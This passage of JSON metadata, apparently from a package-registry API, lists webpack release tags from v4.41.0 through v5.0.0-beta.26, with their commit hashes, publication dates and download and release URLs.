/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/reposit